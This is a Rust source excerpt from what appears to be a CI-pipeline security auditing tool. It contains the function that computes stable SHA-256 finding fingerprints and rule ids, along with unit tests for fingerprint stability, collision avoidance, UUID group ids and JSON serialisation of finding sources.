654/// finding's `category` (the same string serde uses to serialize the
655/// category enum).
656///
657/// JSON, SARIF, and CloudEvents emitters all share this helper to ensure
658/// the `rule_id` field is identical across the three sinks.
659pub fn rule_id_for(finding: &Finding) -> String {
660 extract_custom_rule_id(&finding.message)
661 .map(str::to_string)
662 .unwrap_or_else(|| category_rule_id(&finding.category))
663}
664
665/// Compute a stable cross-run fingerprint for a finding.
666///
667/// The fingerprint identifies "the same logical issue" across re-runs and
668/// across non-cosmetic edits to the surrounding pipeline. Two runs against
669/// the same input file produce the same fingerprint; a fix to the
670/// underlying issue makes the fingerprint disappear; a tweak to the
671/// finding's user-facing message does NOT change the fingerprint.
672///
673/// **Algorithm version `v2`** (replaces v1 from v0.9.1).
674///
675/// v1 collapsed every per-hop finding against the same root Secret/Identity
676/// onto a single fingerprint. That hides genuinely distinct issues — two
677/// untrusted steps reaching the same secret are two separate
678/// remediation-distinct findings, not one. v2 makes every component of the
679/// finding contribute to the hash so unrelated findings cannot alias.
680///
681/// **Inputs (sensitive to):**
682/// * Rule id — either a custom rule id parsed from a `[id] …` message
683/// prefix, or the snake_case form of `finding.category`
684/// * Source file path (`graph.source.file`) — verbatim, never normalised
685/// to a basename, so two pipelines named the same file in different
686/// directories never collide
687/// * Finding category (snake_case)
688/// * Root-authority node name — Secret/Identity name when one is
689/// involved, empty string otherwise. Surfaces the credential identity
690/// in the SIEM context column without being the only differentiator.
691/// * Ordered involved-node names — every node in `nodes_involved`,
692/// joined in original order (preserves caller intent so per-hop
693/// findings against the same secret produce distinct fingerprints).
694///
695/// **Inputs (insensitive to):**
696/// * Wall-clock time
697/// * The finding's `message` text — operators tweak phrasing without
698/// wanting suppressions to break
699/// * `taudit` version string
700/// * Environment / host / cwd
701/// * Pipeline file content hash — only the path matters
702///
703/// Stability guarantee: the v2 algorithm is stable for the v0.10+ line.
704/// Pre-v0.10 (v1 algorithm) suppressions DO NOT carry forward — a one-time
705/// re-baselining is required when upgrading. CHANGELOG and
706/// `docs/finding-fingerprint.md` flag the break explicitly.
707///
708/// Output: SHA-256 of the canonical input string, truncated to the first
709/// 16 hex characters (64 bits — collision-resistant enough for finding
710/// dedup, short enough to be human-glanceable in a SIEM table).
711pub fn compute_fingerprint(finding: &Finding, graph: &AuthorityGraph) -> String {
712 let rule_id = extract_custom_rule_id(&finding.message)
713 .map(str::to_string)
714 .unwrap_or_else(|| category_rule_id(&finding.category));
715
716 let category = category_rule_id(&finding.category);
717 let file = graph.source.file.as_str();
718
719 // Root authority name (if any) — always emitted as its own component,
720 // empty string when no Secret/Identity is involved. Distinct field so
721 // a finding whose root_authority differs from a sibling's is
722 // recognisably different even when the involved-node list happens to
723 // overlap.
724 let root_authority: String = finding
725 .nodes_involved
726 .iter()
727 .filter_map(|id| graph.node(*id))
728 .find(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
729 .map(|n| n.name.clone())
730 .unwrap_or_default();
731
732 // Ordered involved-node names. Order is preserved (NOT sorted) — for
733 // authority_propagation findings the convention is `[source, sink]`,
734 // so two findings hitting the same secret but reaching different
735 // untrusted steps produce different fingerprints (the v1 collision
736 // class). Empty string when no nodes are involved.
737 let nodes_ordered: String = finding
738 .nodes_involved
739 .iter()
740 .filter_map(|id| graph.node(*id))
741 .map(|n| n.name.as_str())
742 .collect::<Vec<_>>()
743 .join(",");
744
745 // Canonical encoding: every component prefixed with a tag and joined
746 // by `\x1f` (ASCII unit separator) so component boundaries cannot
747 // alias across inputs. Algorithm version baked into the prefix so a
748 // future change to the contract is detectable from the canonical
749 // string alone.
750 let canonical = format!(
751 "v2\x1frule={rule_id}\x1ffile={file}\x1fcategory={category}\x1froot={root_authority}\x1fnodes={nodes_ordered}"
752 );
753
754 let digest = Sha256::digest(canonical.as_bytes());
755 let mut out = String::with_capacity(16);
756 for byte in &digest[..8] {
757 use std::fmt::Write;
758 // 8 bytes -> 16 hex chars
759 let _ = write!(&mut out, "{byte:02x}");
760 }
761 out
762}
763
#[cfg(test)]
mod fingerprint_tests {
    use super::*;
    use crate::graph::{AuthorityGraph, NodeKind, PipelineSource, TrustZone};

    // Minimal PipelineSource carrying only the file path — the other
    // provenance fields (repo/ref/sha) do not participate in the
    // fingerprint contract, so tests leave them unset.
    fn source(file: &str) -> PipelineSource {
        PipelineSource {
            file: file.to_string(),
            repo: None,
            git_ref: None,
            commit_sha: None,
        }
    }

    // Finding factory with fixed severity/recommendation/source so each
    // test varies only the inputs the fingerprint is sensitive to:
    // category, message (for the custom-rule prefix), and node list.
    fn make_finding(category: FindingCategory, msg: &str, nodes: Vec<NodeId>) -> Finding {
        Finding {
            severity: Severity::High,
            category,
            path: None,
            nodes_involved: nodes,
            message: msg.to_string(),
            recommendation: Recommendation::Manual {
                action: "fix it".to_string(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        }
    }

    #[test]
    fn fingerprint_is_stable_across_repeat_calls() {
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
        let f = make_finding(
            FindingCategory::AuthorityPropagation,
            "AWS_KEY reaches third party",
            vec![s],
        );
        let a = compute_fingerprint(&f, &graph);
        let b = compute_fingerprint(&f, &graph);
        assert_eq!(a, b, "same finding must hash identically across calls");
        assert_eq!(a.len(), 16, "fingerprint is 16 hex chars");
        assert!(a.chars().all(|c| c.is_ascii_hexdigit()));
    }

    #[test]
    fn different_files_produce_different_fingerprints() {
        let mut g_a = AuthorityGraph::new(source("workflows/a.yml"));
        let mut g_b = AuthorityGraph::new(source("workflows/b.yml"));
        let s_a = g_a.add_node(NodeKind::Secret, "TOKEN", TrustZone::FirstParty);
        let s_b = g_b.add_node(NodeKind::Secret, "TOKEN", TrustZone::FirstParty);
        let f_a = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s_a]);
        let f_b = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s_b]);
        assert_ne!(
            compute_fingerprint(&f_a, &g_a),
            compute_fingerprint(&f_b, &g_b)
        );
    }

    #[test]
    fn different_rules_produce_different_fingerprints() {
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
        let f1 = make_finding(FindingCategory::AuthorityPropagation, "msg", vec![s]);
        let f2 = make_finding(FindingCategory::UntrustedWithAuthority, "msg", vec![s]);
        assert_ne!(
            compute_fingerprint(&f1, &graph),
            compute_fingerprint(&f2, &graph)
        );
    }

    #[test]
    fn message_changes_do_not_affect_fingerprint() {
        // The whole point of cross-run dedup: an operator can re-word
        // the message text without breaking SIEM suppressions.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "AWS_KEY", TrustZone::FirstParty);
        let f1 = make_finding(
            FindingCategory::AuthorityPropagation,
            "old phrasing of the message",
            vec![s],
        );
        let f2 = make_finding(
            FindingCategory::AuthorityPropagation,
            "completely different new phrasing",
            vec![s],
        );
        assert_eq!(
            compute_fingerprint(&f1, &graph),
            compute_fingerprint(&f2, &graph)
        );
    }

    #[test]
    fn per_hop_findings_against_same_authority_are_distinct() {
        // v2 contract: a single secret reaching N distinct untrusted steps
        // produces N distinct fingerprints. Each (secret, step) pair is its
        // own remediation-distinct finding — collapsing them (the v1
        // behaviour) hid genuinely different exposure surfaces. SIEMs that
        // want a per-secret rollup can group on root_authority client-side.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let secret = graph.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
        let step_a = graph.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
        let step_b = graph.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);

        let f_a = make_finding(
            FindingCategory::AuthorityPropagation,
            "DEPLOY_TOKEN reaches deploy[0]",
            vec![secret, step_a],
        );
        let f_b = make_finding(
            FindingCategory::AuthorityPropagation,
            "DEPLOY_TOKEN reaches deploy[1]",
            vec![secret, step_b],
        );
        assert_ne!(
            compute_fingerprint(&f_a, &graph),
            compute_fingerprint(&f_b, &graph),
            "per-hop findings against one secret must produce distinct \
             fingerprints — sink identity is part of the issue"
        );
    }

    #[test]
    fn same_secret_same_sink_remains_stable_across_calls() {
        // Re-running the SAME finding (same secret, same sink, same file)
        // must still produce the same fingerprint — that is the entire
        // point of cross-run dedup. The v2 change adds inputs but does not
        // introduce non-determinism.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let secret = graph.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
        let step = graph.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
        let f = make_finding(
            FindingCategory::AuthorityPropagation,
            "msg",
            vec![secret, step],
        );
        assert_eq!(
            compute_fingerprint(&f, &graph),
            compute_fingerprint(&f, &graph)
        );
    }

    #[test]
    fn r2_attack2_two_files_same_secret_name_distinct_fingerprints() {
        // R2 attack #2 reproducer: two genuinely different findings in two
        // different pipeline files that share a secret NAME must produce
        // different fingerprints. The earlier (pre-v0.9.1) algorithm could
        // collide here; the v2 algorithm explicitly includes file path so
        // the names cannot alias across files.
        let mut g_a = AuthorityGraph::new(source("workflows/a.yml"));
        let mut g_b = AuthorityGraph::new(source("workflows/b.yml"));
        let s_a = g_a.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
        let sink_a = g_a.add_node(NodeKind::Step, "evil/action", TrustZone::Untrusted);
        let s_b = g_b.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
        let sink_b = g_b.add_node(
            NodeKind::Step,
            "different-evil/action",
            TrustZone::Untrusted,
        );

        let f_a = make_finding(
            FindingCategory::AuthorityPropagation,
            "MY_SECRET reaches evil/action",
            vec![s_a, sink_a],
        );
        let f_b = make_finding(
            FindingCategory::AuthorityPropagation,
            "MY_SECRET reaches different-evil/action",
            vec![s_b, sink_b],
        );
        assert_ne!(
            compute_fingerprint(&f_a, &g_a),
            compute_fingerprint(&f_b, &g_b),
            "two genuinely different findings must not share a fingerprint \
             just because the secret name overlaps"
        );
    }

    #[test]
    fn root_authority_segment_is_always_present_even_when_empty() {
        // Findings without any Secret/Identity (e.g. floating_image) MUST
        // still produce a stable fingerprint. The empty-root case is its
        // own equivalence class — two such findings with the same node
        // list collapse to the same fingerprint; differing node lists
        // produce different fingerprints.
        let mut g = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let img_a = g.add_node(NodeKind::Image, "alpine:latest", TrustZone::ThirdParty);
        let img_b = g.add_node(NodeKind::Image, "ubuntu:22.04", TrustZone::ThirdParty);
        let f_a = make_finding(FindingCategory::FloatingImage, "msg-a", vec![img_a]);
        let f_b = make_finding(FindingCategory::FloatingImage, "msg-b", vec![img_b]);
        let fp_a = compute_fingerprint(&f_a, &g);
        let fp_b = compute_fingerprint(&f_b, &g);
        assert_ne!(
            fp_a, fp_b,
            "two distinct floating-image findings must not collide"
        );
        assert_eq!(fp_a.len(), 16);
        assert_eq!(fp_b.len(), 16);
    }

    #[test]
    fn node_order_is_significant() {
        // The fingerprint preserves caller order in nodes_involved. A
        // finding emitted as [secret, step] is semantically different from
        // [step, secret] (source vs sink role) and produces a different
        // fingerprint. Rules must therefore stay consistent in the order
        // they push nodes — every built-in does today.
        let mut g = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = g.add_node(NodeKind::Secret, "K", TrustZone::FirstParty);
        let step = g.add_node(NodeKind::Step, "use", TrustZone::Untrusted);
        let forward = make_finding(FindingCategory::AuthorityPropagation, "x", vec![s, step]);
        let reverse = make_finding(FindingCategory::AuthorityPropagation, "x", vec![step, s]);
        assert_ne!(
            compute_fingerprint(&forward, &g),
            compute_fingerprint(&reverse, &g),
            "node order must influence the fingerprint so role swap is detectable"
        );
    }

    #[test]
    fn custom_rule_id_in_message_is_used() {
        // Custom rules carry id in `[id] message` prefix; fingerprint
        // must key on the custom id, not the category fallback.
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
        let f_custom = make_finding(
            FindingCategory::UnpinnedAction,
            "[my_custom_rule] something happened",
            vec![s],
        );
        let f_plain = make_finding(FindingCategory::UnpinnedAction, "no prefix here", vec![s]);
        assert_ne!(
            compute_fingerprint(&f_custom, &graph),
            compute_fingerprint(&f_plain, &graph),
            "custom rule id must distinguish from category fallback"
        );
    }

    #[test]
    fn finding_group_id_is_deterministic_uuid_v5() {
        // Same fingerprint -> same group id, byte-identical.
        let g1 = compute_finding_group_id("5edb30f4db3b5fa3");
        let g2 = compute_finding_group_id("5edb30f4db3b5fa3");
        assert_eq!(g1, g2);
        // UUID v5 shape: 8-4-4-4-12 hex chars with version=5 nibble.
        assert_eq!(g1.len(), 36);
        // Position 14 is the version nibble — must be '5' for v5.
        assert_eq!(
            g1.chars().nth(14),
            Some('5'),
            "expected v5 marker, got {g1}"
        );
        // Position 19 is the variant nibble — must be one of 8/9/a/b.
        let variant = g1.chars().nth(19).unwrap();
        assert!(
            matches!(variant, '8' | '9' | 'a' | 'b'),
            "expected RFC 4122 variant, got {variant}"
        );
        // Different fingerprint -> different group id.
        assert_ne!(g1, compute_finding_group_id("a3c8d9e1f2b4c5d6"));
    }

    #[test]
    fn with_time_to_fix_attaches_effort() {
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
        let f = make_finding(FindingCategory::UnpinnedAction, "msg", vec![s])
            .with_time_to_fix(FixEffort::Trivial);
        assert_eq!(f.extras.time_to_fix, Some(FixEffort::Trivial));
    }

    #[test]
    fn with_compensating_control_downgrades_and_records_original() {
        let mut graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let s = graph.add_node(NodeKind::Secret, "X", TrustZone::FirstParty);
        let f = make_finding(FindingCategory::TriggerContextMismatch, "msg", vec![s])
            .with_compensating_control("fork check present");
        // Default High in make_finding -> downgraded to Medium.
        assert_eq!(f.severity, Severity::Medium);
        assert_eq!(f.extras.original_severity, Some(Severity::High));
        assert_eq!(f.extras.compensating_controls.len(), 1);
    }

    #[test]
    fn empty_node_list_still_produces_fingerprint() {
        // Categories like authority_cycle, floating_image, unpinned_action
        // may not carry an authority node — fingerprint must still work.
        let graph = AuthorityGraph::new(source(".github/workflows/ci.yml"));
        let f = make_finding(FindingCategory::UnpinnedAction, "no nodes here", vec![]);
        let fp = compute_fingerprint(&f, &graph);
        assert_eq!(fp.len(), 16);
        assert!(fp.chars().all(|c| c.is_ascii_hexdigit()));
    }
}
1059
#[cfg(test)]
mod source_tests {
    use super::*;

    // `FindingSource` serde contract: `BuiltIn` is a bare string,
    // `Custom` is an externally-tagged object carrying the loader path.
    #[test]
    fn built_in_serializes_as_string() {
        let s = FindingSource::BuiltIn;
        let v = serde_json::to_value(&s).unwrap();
        assert_eq!(v, serde_json::json!("built-in"));
    }

    #[test]
    fn custom_serializes_with_path_payload() {
        let s = FindingSource::Custom {
            source_file: PathBuf::from("/policies/no_prod_pat.yml"),
        };
        let v = serde_json::to_value(&s).unwrap();
        assert_eq!(
            v,
            serde_json::json!({"custom": {"source_file": "/policies/no_prod_pat.yml"}})
        );
    }

    #[test]
    fn finding_round_trip_preserves_built_in_source() {
        let f = Finding {
            severity: Severity::High,
            category: FindingCategory::AuthorityPropagation,
            path: None,
            nodes_involved: vec![],
            message: "x".into(),
            recommendation: Recommendation::Manual {
                action: "fix".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        };
        let s = serde_json::to_string(&f).unwrap();
        // Encoded as the literal `"source":"built-in"` — operators eyeballing
        // raw JSON immediately see "this is a shipped rule".
        assert!(
            s.contains("\"source\":\"built-in\""),
            "built-in source must serialise as \"built-in\": {s}"
        );
        let f2: Finding = serde_json::from_str(&s).unwrap();
        assert_eq!(f2.source, FindingSource::BuiltIn);
    }

    #[test]
    fn finding_round_trip_preserves_custom_source_with_path() {
        let path = PathBuf::from("/work/invariants/no_prod_pat.yml");
        let f = Finding {
            severity: Severity::Critical,
            category: FindingCategory::AuthorityPropagation,
            path: None,
            nodes_involved: vec![],
            message: "[no_prod_pat] hit".into(),
            recommendation: Recommendation::Manual {
                action: "fix".into(),
            },
            source: FindingSource::Custom {
                source_file: path.clone(),
            },
            extras: FindingExtras::default(),
        };
        let s = serde_json::to_string(&f).unwrap();
        assert!(
            s.contains("\"custom\""),
            "custom source must serialise with `custom` key: {s}"
        );
        assert!(
            s.contains("/work/invariants/no_prod_pat.yml"),
            "custom source must include the loader path: {s}"
        );
        let f2: Finding = serde_json::from_str(&s).unwrap();
        assert_eq!(
            f2.source,
            FindingSource::Custom { source_file: path },
            "round-trip must preserve custom source path"
        );
    }

    #[test]
    fn missing_source_field_deserializes_as_built_in() {
        // Backward-compat: pre-provenance JSON omits the field entirely; the
        // serde default makes it `BuiltIn`. Without this, every old
        // suppression DB would fail to parse on upgrade.
        let json = r#"{
            "severity": "high",
            "category": "authority_propagation",
            "nodes_involved": [],
            "message": "old-format finding",
            "recommendation": {"type": "manual", "action": "review"}
        }"#;
        let f: Finding = serde_json::from_str(json).expect("legacy JSON must parse");
        assert_eq!(f.source, FindingSource::BuiltIn);
    }
}
1157}